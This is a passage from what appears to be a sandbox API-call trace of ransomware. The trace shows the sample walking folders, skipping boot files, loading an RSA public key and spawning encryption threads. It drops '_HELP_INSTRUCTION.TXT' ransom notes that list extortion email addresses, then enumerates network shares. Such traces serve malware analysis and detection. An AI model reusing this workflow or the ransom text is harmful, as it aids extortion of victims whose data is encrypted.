lpString1="Sample Media") returned="Sample Media" [0211.949] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0211.949] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0211.949] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0211.949] SetErrorMode (uMode=0x1) returned 0x1 [0211.949] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0211.949] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0211.949] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0211.949] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Videos\\*.*") returned="C:\\Users\\Public\\Videos\\*.*" [0211.949] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0211.949] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos") returned="Videos" [0211.949] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0211.949] StrStrW (lpFirst="9C0539442839CAF8E19E36092CAFAF40.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0211.949] StrStrW (lpFirst="9C0539442839CAF8E19E36092CAFAF40.XZZX", lpSrch="ntldr") returned 0x0 [0211.949] StrStrW (lpFirst="9C0539442839CAF8E19E36092CAFAF40.XZZX", lpSrch="NTLDR") returned 0x0 [0211.949] StrStrW (lpFirst="9C0539442839CAF8E19E36092CAFAF40.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0211.949] StrStrW (lpFirst="9C0539442839CAF8E19E36092CAFAF40.XZZX", lpSrch="ntdetect.com") returned 0x0 [0211.949] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\") returned 27 [0211.949] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Videos\\") [0211.950] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.950] lstrcpyW (in: lpString1=0x17cf1c, lpString2="9C0539442839CAF8E19E36092CAFAF40.XZZX" | out: lpString1="9C0539442839CAF8E19E36092CAFAF40.XZZX") returned="9C0539442839CAF8E19E36092CAFAF40.XZZX" [0211.950] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\" [0211.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfd0 [0211.950] Sleep (dwMilliseconds=0x96) [0212.103] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0212.103] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0212.103] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0212.103] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0212.103] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0212.103] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0212.103] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0212.103] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0212.103] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0212.103] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Videos\\*.*") returned="C:\\Users\\Public\\Videos\\*.*" [0212.103] SetErrorMode (uMode=0x1) returned 0x1 [0212.103] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Videos\\_HELP_INSTRUCTION.TXT") returned 44 [0212.103] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0212.104] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0212.104] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xfd4) returned 0x0 [0212.104] RegQueryValueExW (in: hKey=0xfd4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43696a0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43696a0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0212.104] RegCloseKey (hKey=0xfd4) returned 0x0 [0212.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0212.104] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0212.104] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfd4 [0212.104] CloseHandle (hObject=0xfd4) returned 1 [0212.104] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0212.104] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos") returned="Videos" [0212.104] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0212.104] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0212.104] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0212.104] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0212.104] SetErrorMode (uMode=0x1) returned 0x1 [0212.104] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0212.105] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0212.105] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0212.105] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned="C:\\Users\\Public\\Videos\\Sample Videos\\*.*" [0212.105] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0212.105] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos\\Sample Videos") returned="Sample Videos" [0212.105] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0212.105] StrStrW (lpFirst="168E33E2343B04A525B9D9AE38C0E8ED.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0212.105] StrStrW (lpFirst="168E33E2343B04A525B9D9AE38C0E8ED.XZZX", lpSrch="ntldr") returned 0x0 [0212.105] StrStrW (lpFirst="168E33E2343B04A525B9D9AE38C0E8ED.XZZX", lpSrch="NTLDR") returned 0x0 [0212.105] StrStrW (lpFirst="168E33E2343B04A525B9D9AE38C0E8ED.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0212.105] StrStrW (lpFirst="168E33E2343B04A525B9D9AE38C0E8ED.XZZX", lpSrch="ntdetect.com") returned 0x0 [0212.105] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned 41 [0212.105] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") [0212.105] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0212.105] lstrcpyW (in: lpString1=0x17be7c, lpString2="168E33E2343B04A525B9D9AE38C0E8ED.XZZX" | out: lpString1="168E33E2343B04A525B9D9AE38C0E8ED.XZZX") returned="168E33E2343B04A525B9D9AE38C0E8ED.XZZX" [0212.105] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0212.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfdc [0212.106] Sleep (dwMilliseconds=0x96) [0212.259] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0212.259] lstrcmpW (lpString1="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpString2="..") returned 1 [0212.259] lstrcmpW (lpString1="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpString2=".") returned 1 [0212.259] StrStrW (lpFirst="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0212.259] StrStrW (lpFirst="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpSrch="ntldr") returned 0x0 [0212.259] StrStrW (lpFirst="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpSrch="NTLDR") returned 0x0 [0212.259] StrStrW (lpFirst="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0212.259] StrStrW (lpFirst="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0212.259] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned 41 [0212.259] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") [0212.260] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0212.260] lstrcpyW (in: lpString1=0x17be7c, lpString2="AE3F22464654D223AFF867CA4A80B66B.XZZX" | out: lpString1="AE3F22464654D223AFF867CA4A80B66B.XZZX") returned="AE3F22464654D223AFF867CA4A80B66B.XZZX" [0212.260] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0212.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfe0 [0212.260] Sleep (dwMilliseconds=0x96) [0212.415] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0212.415] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0212.415] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0212.415] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0212.415] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0212.415] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0212.415] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0212.415] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0212.415] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned="C:\\Users\\Public\\Videos\\Sample Videos\\*.*" [0212.415] SetErrorMode (uMode=0x1) returned 0x1 [0212.415] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0212.415] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0212.415] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0212.416] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xfe4) returned 0x0 [0212.416] RegQueryValueExW (in: hKey=0xfe4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43698d0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43698d0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0212.416] RegCloseKey (hKey=0xfe4) returned 0x0 [0212.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0212.416] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0212.416] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\videos\\sample videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfe4 [0212.416] CloseHandle (hObject=0xfe4) returned 1 [0212.416] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0212.416] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos\\Sample Videos") returned="Sample Videos" [0212.416] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0212.416] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0212.416] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0212.416] lstrcatW (in: lpString1="C:\\", lpString2="Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0212.416] SetErrorMode (uMode=0x1) returned 0x1 [0212.416] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0212.416] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0212.416] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Windows\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0212.416] lstrcatW (in: lpString1="C:\\Windows\\", lpString2="*.*" | out: lpString1="C:\\Windows\\*.*") returned="C:\\Windows\\*.*" [0212.416] FindFirstFileW (in: lpFileName="C:\\Windows\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0212.416] PathFindFileNameW (pszPath="C:\\Windows") returned="Windows" [0212.416] lstrcpyW (in: lpString1=0x17e824, lpString2="Windows" | out: lpString1="Windows") returned="Windows" [0212.417] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0212.417] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\*.*" | out: lpString1="C:\\Windows\\*.*") returned="C:\\Windows\\*.*" [0212.417] SetErrorMode (uMode=0x1) returned 0x1 [0212.417] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Windows\\_HELP_INSTRUCTION.TXT") returned 32 [0212.417] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0212.417] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0212.417] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0xfe8) returned 0x0 [0212.417] RegQueryValueExW (in: hKey=0xfe8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4369b00, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x4369b00*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0212.417] RegCloseKey (hKey=0xfe8) returned 0x0 [0212.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0212.417] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0212.417] CreateFileW (lpFileName="C:\\Windows\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\windows\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0212.417] CreateFileW (lpFileName="C:\\Windows\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\windows\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.417] FindFirstFileW (in: lpFileName="C:\\Windows\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0212.417] PathFindFileNameW (pszPath="C:\\Windows") returned="Windows" [0212.417] lstrcpyW (in: lpString1=0x17e824, lpString2="Windows" | out: lpString1="Windows") returned="Windows" [0213.429] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x180b64 | out: lphEnum=0x180b64*=0x4372378) returned 0x0 [0213.429] WNetEnumResourceW (in: hEnum=0x4372378, lpcCount=0x180b60, lpBuffer=0x43bbd70, lpBufferSize=0x180b5c | out: lpcCount=0x180b60, lpBuffer=0x43bbd70, lpBufferSize=0x180b5c) returned 0x0 [0213.429] WNetCloseEnum (hEnum=0x4372378) returned 0x0 [0213.429] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x43bbd70, lphEnum=0x180b34 | out: lphEnum=0x180b34*=0x436a538) returned 0x0 [0213.430] WNetEnumResourceW (in: hEnum=0x436a538, lpcCount=0x180b30, lpBuffer=0x43c3a78, lpBufferSize=0x180b2c | out: lpcCount=0x180b30, lpBuffer=0x43c3a78, lpBufferSize=0x180b2c) returned 0x103 [0213.430] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x43bbd90, lphEnum=0x180b34 | out: lphEnum=0x180b34*=0x0) returned 0x4b8 [0225.644] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x43bbdb0, lphEnum=0x180b34 | out: lphEnum=0x180b34*=0x0) returned 0x4c6 [0225.644] OutputDebugStringA 